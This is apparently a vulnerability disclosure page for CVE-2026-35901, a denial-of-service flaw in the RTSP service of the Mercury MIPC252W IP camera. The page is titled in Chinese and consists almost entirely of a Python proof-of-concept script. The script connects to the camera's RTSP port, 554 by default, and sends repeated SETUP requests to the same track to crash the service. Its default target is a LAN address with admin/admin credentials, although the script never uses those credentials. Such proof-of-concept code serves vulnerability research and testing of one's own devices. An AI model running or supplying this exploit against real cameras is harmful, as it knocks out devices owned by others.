CVE-2026-35901 Mercury MIPC252W RTSP拒绝服务漏洞

import socket def exploit_rtsp_dos(target_ip, target_port, username, password): """ PoC for CVE-2026-35901 Trigger DoS by sending repeated SETUP requests. """ # Connect to RTSP service s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_ip, target_port)) # Basic RTSP Sequence (Simplified) # 1. DESCRIBE (Not always strictly needed for the specific crash, but good for context) # 2. SETUP (Initial) # 3. SETUP (Repeated - Trigger) url = f"rtsp://{target_ip}:{target_port}/live" session_id = "123456" # Placeholder, usually extracted from server response # Sending repeated SETUP requests to the same track for i in range(10): payload = f"SETUP {url}/trackID=1 RTSP/1.0\r\n" payload += f"CSeq: {i}\r\n" payload += f"Session: {session_id}\r\n" payload += "Transport: RTP/AVP;unicast;client_port=5000-5001\r\n\r\n" try: s.send(payload.encode()) print(f"Sent SETUP request {i}") except Exception as e: print(f"Connection reset by peer: {e}") break s.close() if __name__ == "__main__": # Replace with actual target details exploit_rtsp_dos("192.168.1.100", 554, "admin", "admin")